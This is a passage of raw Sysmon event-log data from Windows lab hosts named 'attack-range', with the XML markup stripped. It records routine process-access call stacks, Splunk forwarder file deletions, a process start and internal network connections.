indows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c 10341000x8000000000000000285898Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:50.781{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c 10341000x8000000000000000285897Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:50.781{C8EA50B7-F2AD-6215-B900-000000003802}44365280C:\Windows\system32\sihost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2064e|C:\Windows\SYSTEM32\ntdll.dll+1e864|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000285896Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:50.609{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c 10341000x8000000000000000285895Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:50.609{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C100-000000003802}5080C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c 10341000x8000000000000000285894Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:50.609{C8EA50B7-F11F-6215-0C00-000000003802}8282732C:\Windows\system32\svchost.exe{C8EA50B7-F2AF-6215-C200-000000003802}4300C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c 354300x8000000000000000285893Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:48.694{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53285-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000285892Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:50.375{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=662862C3662B4D5CC8167868BB10E9EE,SHA256=CF5FFB9BC176FD99C23D50D087B43A66D0F5A34709A0BD7D5E229B34E5F855BA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000214968Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:51.493{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0F33-6216-1704-000000003902}1908C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214967Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:51.493{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214966Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:51.493{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214965Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:51.493{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214964Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:51.493{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214963Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:51.493{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214962Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:51.493{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214961Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:51.493{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214960Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:51.493{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214959Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:51.493{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214958Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:51.493{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-0F33-6216-1704-000000003902}1908C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214957Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:51.493{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0F33-6216-1704-000000003902}1908C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214956Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:51.493{4F8D34B0-0F33-6216-1704-000000003902}1908C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000214955Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:51.321{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=52E9F349F5266285EE9CB8454CF613E5,SHA256=37F229FA6FC11CD671F222156B92E9AA5670A5D47174D620D796739BA1D72801,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285903Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:51.406{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1099A6A74EC84DDCEB3BE7AC681159F,SHA256=6A7E1806281657B47637FA8D3FD3520C25CDCCC2F4923D59471C3704D65DBBBE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214970Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:52.508{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9BD5EDD0C4EDEBD3699B569DB56C12A1,SHA256=D7C3966ED3AB075A7B56E979FA67C7F069E3883E2BA813F259D7F837B1C9B46E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214969Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:52.336{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55FFA3A7DF0A9101B3052010FB497174,SHA256=D183EB37D68667FBA122A2C9256B47B1C2D126CE0FA500C1DE0351F1A2674A4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285904Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:52.469{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB25AECB18266EF4E6E8E2BE286A6D80,SHA256=88746DAB076AF094A2184BC5293EC98651F10CAE5BC37B155E88D371FED7EF8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000214971Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:53.399{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E935A4532DCFC9CC604FFA5AAE82D0D2,SHA256=104CF5962EDDCF3C9A211F222BE2F16A84BC1548353EFCA0AA797E9730796044,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285905Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:53.500{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B08DE5FE325486F00798F2BB6B85B746,SHA256=894DD0030A6D309BAF1303D2A82020709AB2488A3E0E14243294B34DF70D9126,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000285906Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:40:54.531{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD1C7C8FC651BDF134DD32656AB956FE,SHA256=8CD7926EB5A5B007B9CCA3964E34BE370230FE43B86B34241BD1444074F78260,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000214973Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:51.665{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51223-false10.0.1.12-8000- 23542300x8000000000000000214972Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:40:54.430{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 